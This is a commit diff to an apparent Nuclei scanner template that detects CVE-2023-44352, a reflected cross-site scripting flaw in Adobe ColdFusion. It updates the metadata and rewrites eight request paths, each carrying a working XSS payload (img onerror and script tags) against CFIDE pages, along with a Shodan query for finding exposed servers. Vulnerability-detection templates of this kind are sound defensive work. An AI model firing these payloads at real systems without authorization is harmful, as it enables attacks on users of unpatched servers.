minor update

2024-01-13 11:22:21 +05:30 · 2024-01-13 11:22:21 +05:30 · 151f497d23
parent ba77a16bd3
commit 151f497d23
1 changed files with 28 additions and 15 deletions
--- a/http/cves/2023/CVE-2023-44352.yaml
+++ b/http/cves/2023/CVE-2023-44352.yaml
@ -1,10 +1,10 @@
 id: CVE-2023-44352

 info:
-  name: CVE-2023-44352 - Reflected XSS in Adobe ColdFusion
-  author: pwnii (pwnwithlove)
+  name: Adobe Coldfusion - Reflected Cross-Site Scripting
+  author: pwnwithlove
  severity: medium
-  description: Reflected XSS in Adobe ColdFusion
+  description: Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44352
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
@ -13,27 +13,40 @@ info:
    cvss-score: 6.1
    cve-id: CVE-2023-44352
    cwe-id: CWE-79
+    epss-score: 0.0006
+    epss-percentile: 0.23281
+    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: Adobe
    product: Adobe ColdFusion
-  tags: cve, adobe, coldfusion, xss, CVE-2023-44352
+    shodan-query: http.component:"Adobe Coldfusion"
+    verified: true
+  tags: cve,cve2023,coldfusion,adobe,xss

-requests:
+http:
  - method: GET
    path:
-      - "{{BaseURL}}/pwnii\"><img src=a onerror=alert(1)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
-      - "{{BaseURL}}//pwnii\"><img src=a onerror=alert(1)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
-      - "{{BaseURL}}/pwnii\"><img src=a onerror=alert(1)>/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}//pwnii\"><img src=a onerror=alert(1)>/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}/pwnii%22>%3Cscript%3Ealert(1)%3C/script%3E/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}//pwnii%22>%3Cscript%3Ealert(1)%3C/script%3E/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}/pwnii%22>%3Cscript%3Ealert(1)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
-      - "{{BaseURL}}//pwnii%22>%3Cscript%3Ealert(1)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
+      - "{{BaseURL}}/pwnii\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
+      - "{{BaseURL}}//pwnii\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
+      - "{{BaseURL}}/pwnii\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm"
+      - "{{BaseURL}}//pwnii\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm"
+      - "{{BaseURL}}/pwnii%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm"
+      - "{{BaseURL}}//pwnii%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm"
+      - "{{BaseURL}}/pwnii%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
+      - "{{BaseURL}}//pwnii%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
+    
+    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
+        name: xss1
        words:
-          - "pwnii\"><img src=a onerror=alert(1)>/"
-          - "<script>alert(1)</script>"
+          - "pwnii\"><img src=a onerror=alert(document.domain)>/"
+
+      - type: word
+        name: xss2
+        words:
+          - "<script>alert(document.domain)</script>"
          - "pwnii"
+        condition: and